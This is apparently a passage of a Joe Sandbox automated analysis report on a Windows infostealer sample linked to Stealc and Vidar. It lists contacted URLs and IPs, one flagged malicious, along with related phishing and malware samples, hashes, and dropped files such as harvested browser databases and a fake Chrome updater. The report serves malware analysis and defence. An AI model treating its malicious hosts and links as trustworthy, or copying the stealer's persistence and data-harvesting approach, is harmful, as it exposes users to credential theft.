                                                                              http://anglebug.com/7406chrome.exe, 00000001.00000003.1758922032.00002A10025D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1759282928.00002A1002BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1759255152.00002A10025D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              		unknown
                                                                              https://anglebug.com/7161chrome.exe, 00000001.00000003.1758922032.00002A10025D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1759282928.00002A1002BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1759255152.00002A10025D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              		unknown
                                                                              https://drive-autopush.corp.google.com/chrome.exe, 00000001.00000003.1745153576.00002A1002694000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              		unknown
                                                                              https://www.google.com/search?q=$chrome.exe, 00000001.00000003.1767734831.00002A10032A8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		unknown
                                                                                https://anglebug.com/7162chrome.exe, 00000001.00000003.1758922032.00002A10025D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1759282928.00002A1002BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1759255152.00002A10025D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                		unknown
                                                                                http://anglebug.com/5906chrome.exe, 00000001.00000003.1758922032.00002A10025D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1759282928.00002A1002BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1759255152.00002A10025D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                		unknown
                                                                                http://anglebug.com/2517chrome.exe, 00000001.00000003.1758922032.00002A10025D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1759282928.00002A1002BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1759255152.00002A10025D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                		unknown
                                                                                http://anglebug.com/4937chrome.exe, 00000001.00000003.1758922032.00002A10025D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1759282928.00002A1002BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1759255152.00002A10025D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                		unknown
                                                                                https://issuetracker.google.com/166809097chrome.exe, 00000001.00000003.1759255152.00002A10025D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                		unknown
                                                                                http://issuetracker.google.com/200067929chrome.exe, 00000001.00000003.1759255152.00002A10025D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                		unknown
                                                                                https://lens.google.com/v3/2chrome.exe, 00000001.00000003.1741537126.00002FFC00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1741781702.00002FFC0039C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		unknown
                                                                                  https://anglebug.com/7847chrome.exe, 00000001.00000003.1758922032.00002A10025D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1759282928.00002A1002BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1759255152.00002A10025D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		unknown
                                                                                    https://google-ohttp-relay-join.fastly-edge.com/chrome.exe, 00000001.00000003.1742002484.00002FFC00684000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		unknown
                                                                                      https://lens.google.com/v3/uploadchrome.exe, 00000001.00000003.1742192459.00002FFC006E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1767734831.00002A10032A8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		unknown
                                                                                        http://anglebug.com/3832chrome.exe, 00000001.00000003.1758922032.00002A10025D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1759282928.00002A1002BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1759255152.00002A10025D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        		unknown
                                                                                        https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgWGo3ga1AL9.exe, 00000000.00000002.2313774503.0000000000A74000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        		unknown
                                                                                        https://drive-daily-6.corp.google.com/chrome.exe, 00000001.00000003.1745153576.00002A1002694000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        		unknown
                                                                                        https://drive-daily-0.corp.google.com/chrome.exe, 00000001.00000003.1745153576.00002A1002694000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        		unknown
                                                                                        https://drive-thirdparty.googleusercontent.com/32/type/chrome.exe, 00000001.00000003.1767734831.00002A10032A8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		unknown
                                                                                          https://lens.google.com/uploadchrome.exe, 00000001.00000003.1767281036.00002A1002544000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1768150932.00002A100340C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1767734831.00002A10032A8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		unknown
                                                                                            https://drive-daily-3.corp.google.com/chrome.exe, 00000001.00000003.1745153576.00002A1002694000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            		unknown
                                                                                            http://anglebug.com/6651chrome.exe, 00000001.00000003.1758922032.00002A10025D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1759282928.00002A1002BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1759255152.00002A10025D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		unknown
                                                                                              https://anglebug.com/6574chrome.exe, 00000001.00000003.1758922032.00002A10025D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1759282928.00002A1002BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1759255152.00002A10025D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		unknown
                                                                                                https://anglebug.com/4830chrome.exe, 00000001.00000003.1758922032.00002A10025D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1759282928.00002A1002BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1759255152.00002A10025D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		unknown
                                                                                                  https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17crosoftWGo3ga1AL9.exe, 00000000.00000002.2312969222.00000000004E4000.00000040.00000001.01000000.00000003.sdmpfalse
                                                                                                    		unknown

                                                                                                    World Map of Contacted IPs

                                                                                                    • No. of IPs < 25%
                                                                                                    • 25% < No. of IPs < 50%
                                                                                                    • 50% < No. of IPs < 75%
                                                                                                    • 75% < No. of IPs

                                                                                                    Public IPs

                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                    87.106.236.48
                                                                                                    		osteo9.esalnuvol.comGermany
                                                                                                    		8560ONEANDONE-ASBrauerstrasse48DEfalse
                                                                                                    216.58.206.78
                                                                                                    		play.google.comUnited States
                                                                                                    		15169GOOGLEUSfalse
                                                                                                    142.250.185.100
                                                                                                    		www.google.comUnited States
                                                                                                    		15169GOOGLEUSfalse
                                                                                                    239.255.255.250
                                                                                                    		unknownReserved
                                                                                                    		unknownunknownfalse
                                                                                                    142.250.184.206
                                                                                                    		plus.l.google.comUnited States
                                                                                                    		15169GOOGLEUSfalse
                                                                                                    185.235.128.16
                                                                                                    		unknownUkraine
                                                                                                    		204601ON-LINE-DATAServerlocation-NetherlandsDrontenNLtrue

                                                                                                    Private

                                                                                                    IP
                                                                                                    192.168.2.4
                                                                                                    127.0.0.1

                                                                                                    General Information

                                                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                                                    Analysis ID:1546262
                                                                                                    Start date and time:2024-10-31 17:11:08 +01:00
                                                                                                    Joe Sandbox product:CloudBasic
                                                                                                    Overall analysis duration:0h 9m 17s
                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                    Report type:full
                                                                                                    Cookbook file name:default.jbs
                                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                    Number of analysed new started processes analysed:47
                                                                                                    Number of new started drivers analysed:0
                                                                                                    Number of existing processes analysed:0
                                                                                                    Number of existing drivers analysed:0
                                                                                                    Number of injected processes analysed:0
                                                                                                    Technologies:
                                                                                                    • HCA enabled
                                                                                                    • EGA enabled
                                                                                                    • AMSI enabled
                                                                                                    Analysis Mode:default
                                                                                                    Analysis stop reason:Timeout
                                                                                                    Sample name:WGo3ga1AL9.exe
                                                                                                    renamed because original name is a hash value
                                                                                                    Original Sample Name:61b72b2d4099b7ca2af5318b4ea6a668.exe
                                                                                                    Detection:MAL
                                                                                                    Classification:mal100.troj.adwa.spyw.evad.winEXE@78/58@7/8
                                                                                                    EGA Information:
                                                                                                    • Successful, ratio: 100%
                                                                                                    HCA Information:
                                                                                                    • Successful, ratio: 100%
                                                                                                    • Number of executed functions: 88
                                                                                                    • Number of non-executed functions: 210
                                                                                                    Cookbook Comments:
                                                                                                    • Found application associated with file extension: .exe

                                                                                                    Warnings

                                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                    • Excluded IPs from analysis (whitelisted): 172.217.23.99, 142.250.185.78, 108.177.15.84, 34.104.35.123, 142.250.184.195, 216.58.206.42, 142.250.185.74, 172.217.18.10, 216.58.212.170, 142.250.186.138, 142.250.186.74, 216.58.206.74, 172.217.16.202, 142.250.184.202, 142.250.186.106, 142.250.186.42, 142.250.185.106, 142.250.184.234, 142.250.185.138, 172.217.16.138, 142.250.185.170, 184.28.90.27, 93.184.221.240, 192.229.221.95, 20.42.73.29
                                                                                                    • Excluded domains from analysis (whitelisted): fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, clientservices.googleapis.com, ogads-pa.googleapis.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, login.live.com, e16604.g.akamaiedge.net, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, umwatson.events.data.microsoft.com, clients.l.google.com, www.gstatic.com, prod.fs.microsoft.com.akadns.net
                                                                                                    • HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                    • Report size exceeded maximum capacity and may have missing network information.
                                                                                                    • Report size getting too big, too many NtCreateKey calls found.
                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                    • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                    • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                    • VT rate limit hit for: WGo3ga1AL9.exe

                                                                                                    Simulations

                                                                                                    Behavior and APIs

                                                                                                    TimeTypeDescription
                                                                                                    12:12:06API Interceptor3x Sleep call for process: svchost.exe modified
                                                                                                    12:12:40API Interceptor1x Sleep call for process: GDBFCGIIIJ.exe modified
                                                                                                    12:12:41API Interceptor22x Sleep call for process: powershell.exe modified
                                                                                                    12:13:03API Interceptor1x Sleep call for process: WerFault.exe modified

                                                                                                    Joe Sandbox View / Context

                                                                                                    IPs

                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                    87.106.236.482DpxPyeiUv.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                    • campuspersever.es/chrome_93.exe
                                                                                                    239.255.255.250OPEN FOR MORE INFORMATION (1) (1).docxGet hashmaliciousUnknownBrowse
                                                                                                      (No subject) - 2024-10-31T090531.704.emlGet hashmaliciousUnknownBrowse
                                                                                                        Fw Message from Kevin - Update on Coles Supply Chain Modernisation 31-10-24.emlGet hashmaliciousUnknownBrowse
                                                                                                          https://t.ly/4Nq2xGet hashmaliciousHTMLPhisher, Mamba2FABrowse
                                                                                                            Metro Plastics Technologies.pdfGet hashmaliciousUnknownBrowse
                                                                                                              https://concursolutions.us.com/a25kQvF4zrkinsa51n0h3rdanW1d07r9s0h3nW1Get hashmaliciousUnknownBrowse
                                                                                                                SilverSEAL Corporation -RFQ_RFP_FSR Proposal.pdfGet hashmaliciousPhisherBrowse
                                                                                                                  https://my.toruftuiov.com/a43a39c3-796e-468c-aae4-b83c862e0918Get hashmaliciousUnknownBrowse
                                                                                                                    file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                      https://hidrive.ionos.com/lnk/FamigcCEFGet hashmaliciousUnknownBrowse

                                                                                                                        Domains

                                                                                                                        No context

                                                                                                                        ASNs

                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                        ON-LINE-DATAServerlocation-NetherlandsDrontenNLI43xo3KKfS.exeGet hashmaliciousStealcBrowse
                                                                                                                        • 45.88.105.105
                                                                                                                        Ky4J8k89A7.exeGet hashmaliciousStealc, Vidar, XmrigBrowse
                                                                                                                        • 45.88.105.105
                                                                                                                        b4s45TboUL.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                        • 45.91.200.39
                                                                                                                        qPNf2kJgzI.exeGet hashmaliciousStealcBrowse
                                                                                                                        • 45.91.200.39
                                                                                                                        tdnPqG0jmS.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                        • 45.91.200.39
                                                                                                                        y3c6AzPbtt.exeGet hashmaliciousStealcBrowse
                                                                                                                        • 45.88.105.194
                                                                                                                        kj5la5X8gv.exeGet hashmaliciousStealcBrowse
                                                                                                                        • 45.88.105.194
                                                                                                                        NGy4YdKSwE.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                        • 45.88.105.194
                                                                                                                        5BQwrSLxIZ.exeGet hashmaliciousStealcBrowse
                                                                                                                        • 45.88.76.238
                                                                                                                        WAOfus3Nqk.exeGet hashmaliciousStealcBrowse
                                                                                                                        • 45.88.76.238
                                                                                                                        ONEANDONE-ASBrauerstrasse48DEhttps://hidrive.ionos.com/lnk/FamigcCEFGet hashmaliciousUnknownBrowse
                                                                                                                        • 213.165.66.58
                                                                                                                        Ky4J8k89A7.exeGet hashmaliciousStealc, Vidar, XmrigBrowse
                                                                                                                        • 87.106.236.48
                                                                                                                        Payment&WarantyBonds.exeGet hashmaliciousFormBookBrowse
                                                                                                                        • 217.76.156.252
                                                                                                                        b4s45TboUL.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                        • 87.106.236.48
                                                                                                                        tdnPqG0jmS.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                        • 87.106.236.48
                                                                                                                        Payment&WarantyBonds.exeGet hashmaliciousFormBookBrowse
                                                                                                                        • 217.76.156.252
                                                                                                                        HSBC Payment Advice.exeGet hashmaliciousFormBookBrowse
                                                                                                                        • 217.160.0.118
                                                                                                                        jew.ppc.elfGet hashmaliciousMiraiBrowse
                                                                                                                        • 82.223.130.245
                                                                                                                        2DpxPyeiUv.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                        • 87.106.236.48
                                                                                                                        1.rtfGet hashmaliciousRemcosBrowse
                                                                                                                        • 217.160.66.193

                                                                                                                        JA3 Fingerprints

                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                        28a2c9bd18a11de089ef85a160da29e4(No subject) - 2024-10-31T090531.704.emlGet hashmaliciousUnknownBrowse
                                                                                                                        • 13.107.246.43
                                                                                                                        • 52.149.20.212
                                                                                                                        • 40.126.32.133
                                                                                                                        • 20.109.210.53
                                                                                                                        https://t.ly/4Nq2xGet hashmaliciousHTMLPhisher, Mamba2FABrowse
                                                                                                                        • 13.107.246.43
                                                                                                                        • 52.149.20.212
                                                                                                                        • 40.126.32.133
                                                                                                                        • 20.109.210.53
                                                                                                                        Metro Plastics Technologies.pdfGet hashmaliciousUnknownBrowse
                                                                                                                        • 13.107.246.43
                                                                                                                        • 52.149.20.212
                                                                                                                        • 40.126.32.133
                                                                                                                        • 20.109.210.53
                                                                                                                        https://concursolutions.us.com/a25kQvF4zrkinsa51n0h3rdanW1d07r9s0h3nW1Get hashmaliciousUnknownBrowse
                                                                                                                        • 13.107.246.43
                                                                                                                        • 52.149.20.212
                                                                                                                        • 40.126.32.133
                                                                                                                        • 20.109.210.53
                                                                                                                        SilverSEAL Corporation -RFQ_RFP_FSR Proposal.pdfGet hashmaliciousPhisherBrowse
                                                                                                                        • 13.107.246.43
                                                                                                                        • 52.149.20.212
                                                                                                                        • 40.126.32.133
                                                                                                                        • 20.109.210.53
                                                                                                                        https://my.toruftuiov.com/a43a39c3-796e-468c-aae4-b83c862e0918Get hashmaliciousUnknownBrowse
                                                                                                                        • 13.107.246.43
                                                                                                                        • 52.149.20.212
                                                                                                                        • 40.126.32.133
                                                                                                                        • 20.109.210.53
                                                                                                                        QUOTATION#09678.exeGet hashmaliciousRedLineBrowse
                                                                                                                        • 13.107.246.43
                                                                                                                        • 52.149.20.212
                                                                                                                        • 40.126.32.133
                                                                                                                        • 20.109.210.53
                                                                                                                        file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                        • 13.107.246.43
                                                                                                                        • 52.149.20.212
                                                                                                                        • 40.126.32.133
                                                                                                                        • 20.109.210.53
                                                                                                                        https://hidrive.ionos.com/lnk/FamigcCEFGet hashmaliciousUnknownBrowse
                                                                                                                        • 13.107.246.43
                                                                                                                        • 52.149.20.212
                                                                                                                        • 40.126.32.133
                                                                                                                        • 20.109.210.53
                                                                                                                        http://djaahaf.r.af.d.sendibt2.comGet hashmaliciousUnknownBrowse
                                                                                                                        • 13.107.246.43
                                                                                                                        • 52.149.20.212
                                                                                                                        • 40.126.32.133
                                                                                                                        • 20.109.210.53
                                                                                                                        37f463bf4616ecd445d4a1937da06e19FUNDS TRANSFER - 000009442004 - OUTWARD PAYMENT ADVICE pdf.pif.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                        • 87.106.236.48
                                                                                                                        FUNDS TRANSFER - 000009442004 - OUTWARD PAYMENT ADVICE pdf.pif.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                        • 87.106.236.48
                                                                                                                        PO-000172483 (2).exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                        • 87.106.236.48
                                                                                                                        Quotation.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                        • 87.106.236.48
                                                                                                                        Pedido de Cota#U00e7#U00e3o -RFQ20241030_Pdf.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                        • 87.106.236.48
                                                                                                                        #U2749Factura_#U2749_#U2462#U2465#U2460#U2463#U2463#U2460#U2462#U2461.htaGet hashmaliciousUnknownBrowse
                                                                                                                        • 87.106.236.48
                                                                                                                        #U2749Factura_#U2749_#U2466#U2461#U2466#U2462#U2467#U2465#U2465#U2465.htaGet hashmaliciousUnknownBrowse
                                                                                                                        • 87.106.236.48
                                                                                                                        file.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                                        • 87.106.236.48
                                                                                                                        Contrato.exeGet hashmaliciousDarkCloudBrowse
                                                                                                                        • 87.106.236.48
                                                                                                                        file.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                                        • 87.106.236.48

                                                                                                                        Dropped Files

                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                        C:\ProgramData\chrome.dllfile.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                          file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                            file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                              file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                I43xo3KKfS.exeGet hashmaliciousStealcBrowse
                                                                                                                                  file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                    file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar, WhiteSnake StealerBrowse
                                                                                                                                      file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                        Ky4J8k89A7.exeGet hashmaliciousStealc, Vidar, XmrigBrowse
                                                                                                                                          file.exeGet hashmaliciousStealcBrowse

                                                                                                                                            Created / dropped Files

                                                                                                                                            C:\ProgramData\BGDAAEHD

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\Desktop\WGo3ga1AL9.exe
                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):106496
                                                                                                                                            Entropy (8bit):1.1358696453229276
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                            MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                            SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                            SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                            SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                            C:\ProgramData\EGDGCGCFHIEHIDGDBAAE

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\Desktop\WGo3ga1AL9.exe
                                                                                                                                            File Type:ASCII text, with very long lines (1809), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):9571
                                                                                                                                            Entropy (8bit):5.536643647658967
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:qnaRt+YbBp6ihj4qyaaX86KKkfGNBw8DJSl:yegqumcwQ0
                                                                                                                                            MD5:5D8E5D85E880FB2D153275FCBE9DA6E5
                                                                                                                                            SHA1:72332A8A92B77A8B1E3AA00893D73FC2704B0D13
                                                                                                                                            SHA-256:50490DC0D0A953FA7D5E06105FE9676CDB9B49C399688068541B19DD911B90F9
                                                                                                                                            SHA-512:57441B4CCBA58F557E08AAA0918D1F9AC36D0AF6F6EB3D3C561DA7953ED156E89857FFB829305F65D220AE1075BC825F131D732B589B5844C82CA90B53AAF4EE
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "57f16a19-e119-4073-bf01-28f88011f783");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696333830);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696333856);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

                                                                                                                                            C:\ProgramData\FCGIJDBAFCBAAKECGDGCBKFIDG

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\Desktop\WGo3ga1AL9.exe
                                                                                                                                            File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):98304
                                                                                                                                            Entropy (8bit):0.08235737944063153
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                            MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                            SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                            SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                            SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                            C:\ProgramData\GDBFCGIIIJ.exe

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\Desktop\WGo3ga1AL9.exe
                                                                                                                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):8707480
                                                                                                                                            Entropy (8bit):7.929778234534272
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:196608:50ipMncd0lHU0kioa09gMC1tFKCnuvoMTQybYD+AvBjtO7:5VpBdxRej7nuPTH25tO
                                                                                                                                            MD5:D9A5E741B1F67593422BFB1A165288BB
                                                                                                                                            SHA1:0BC42E46E97FBF3B0754D26D88E43945EDC31A0B
                                                                                                                                            SHA-256:C81A924446D324B3AEB0772DFD9CBED34FB878AFF823BA2888362A22F7328FE8
                                                                                                                                            SHA-512:5A463B581C18E2A2076BBF888EE838745EB8FEA6E718B5882951E18A213F530589CB5CF3D61E2CC4014556DC65A327B56B42B915BD9CEA488ADB4782AF151EA4
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...Cb#g.........."...........l................@.............................`......-.....`.................................................B0n.d....Pn.H....................P..............................(@n.(................................................... .........o.................. ..` .*... ..:....t..............@..@ ..l..P..`.Q.................@... ......m.......R.............@..@ ......m.......R.............@..@ ......n.......R.............@... P.....n.n.....R.............@..@ x.... n.i.....R.............@..B.imports.....0n...... R.............@....tls.........@n......"R..................rsrc........Pn......$R.............@..@.themida..W..`n......(R.............`....boot....l2......l2..(R.............`..`.reloc.......P.........................@........................................................

                                                                                                                                            C:\ProgramData\GDGDHJJDGHCAAAKEHIJK

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\Desktop\WGo3ga1AL9.exe
                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):40960
                                                                                                                                            Entropy (8bit):0.8553638852307782
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                            MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                            C:\ProgramData\Google\Chrome\updater.exe

                                                                                                                                            Download File
                                                                                                                                            Process:C:\ProgramData\GDBFCGIIIJ.exe
                                                                                                                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):8707480
                                                                                                                                            Entropy (8bit):7.929778234534272
                                                                                                                                            Encrypted:false
